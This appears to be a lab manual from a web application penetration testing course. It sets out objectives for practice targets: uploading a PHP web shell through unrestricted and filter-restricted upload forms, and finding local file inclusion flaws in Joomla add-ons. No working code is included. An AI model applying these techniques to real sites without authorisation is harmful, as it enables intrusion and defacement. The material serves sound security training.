© 2018 Caendra Inc.

| Hera for WAPTv3 | File and Resource Attacks 1

In these File and Resource attacks labs, the student can practice attacks techniques
against web applications vulnerable to RFI, LFI, Unrestricted File Upload and much more.

Once you are connected in VPN to the lab environment, all the web applications will be
available at the following URL: http://info.fileres.site.

There are three main sections for each type of lab: Video, Lab, Challenges.

• Video section contains web applications used during video lessons. Therefore, if
you need any information about the scenario, the attacks and so on, please refer to
the corresponding video.
• Labs section contains web application where you can practice the techniques of the
specific module and have solutions. You can find them later in this manual
• Challenges labs do not have solutions; otherwise, why call them challenges? If you
study the course and think like a penetration tester, you will achieve the goal!

The best tool is, as usual, your brain. Then you may need of:

• Web Browser
• Burp Suite

Once you have your virtual network ready, configure the following IP address as default
DNS: 10.100.13.37

• WINDOWS: change the property of the TAP network device, adding as first DNS
server of the IP of the server.
• LINUX: add an entry into /etc/resolv.conf file with the IP address of the server

© 2018 Caendra Inc. | Hera for WAPTv3 | File and Resource Attacks 2
Tomato is a small website for Tomato fans. They share recipes and photos of delicious
tomatoes.

There is a possibility to upload photos within the website. Your objective is to determine
which type of files can be uploaded and whether they cause any security threat to the
website security. In order to prove the threat, you should upload a file that lets you run
PHP commands on the server.

• You will find a secret in the file readthissecret.php in the website root

• How to find and exploit vulnerable upload forms

• How to determine the impact related to an Unrestricted File Upload vulnerability
• How to write your own PHP Shell

© 2018 Caendra Inc. | Hera for WAPTv3 | File and Resource Attacks 3
Tomato is a small website for Tomato fans. They share recipes and photos of delicious
tomatoes.

The website owner has received your suggestion of limiting the type of files being accepted
in the upload web form.

They decided to allow only JPG files. Your objective is to determine if the security
mechanism in place has really fixed the vulnerability.

In order to prove that the threat is still there, you should upload a file that let you run PHP
commands on the server.

• You will find a trophy in the file readthissecret.php in the website root

• How to find and exploit vulnerable upload forms

• How to determine the impact related to an Unrestricted File Upload vulnerability
• How to write your own PHP Shell

© 2018 Caendra Inc. | Hera for WAPTv3 | File and Resource Attacks 4
Max is a webmaster who has decided to use Joomla CMS to power his new website dealing
with Soccer news and stats. He is not aware of the threats related to the use of Common off
the shelf software like Joomla; however, he is not a web developer either.

So, he has hired you to verify the goodness of the Joomla core and of the installed third-
party add-ons through a black box pentest.

The most important feature to Max is the list of Scudetti’s won. This is a list appearing on
the website home page, under the box named “Serie A,” listing the number of leagues won
by each Italian soccer team through time.

It looks like there’s a debate in Italy whether FC Juventus holds 27 or 29 scudetti’s. What
Max is concerned the most with, is to keep the stats intact and prevent pranksters,
criminals and FC Juventus fans to change this amount back to 29.

As a penetration tester, you have to perform a full penetration test by performing an

information gathering phase on Joomla to list all the installed add-ons.

Then, you will move on to find any potentially vulnerable addon.

Finally, you will provide a proof of existence of an exploit (or of an exploitation path) that
allows an FC Juventus fan to increase the number of Scudetti in the Serie A box on the home
page. You can use any third party exploit available on the net or build your own to provide
proof.

• There’s a secret word that will be shown to you once you will increase the FC
Juventus Scudetti’s from 27 to 29

© 2018 Caendra Inc. | Hera for WAPTv3 | File and Resource Attacks 5
• Dirbuster
• Burpsuite

• How Joomla works

• How to look for exploits online
• How to bypass filters
• How Local file inclusion vulnerabilities work
• Which local file inclusion vulnerabilities can be exploited on Windows/IIS stack

© 2018 Caendra Inc. | Hera for WAPTv3 | File and Resource Attacks 6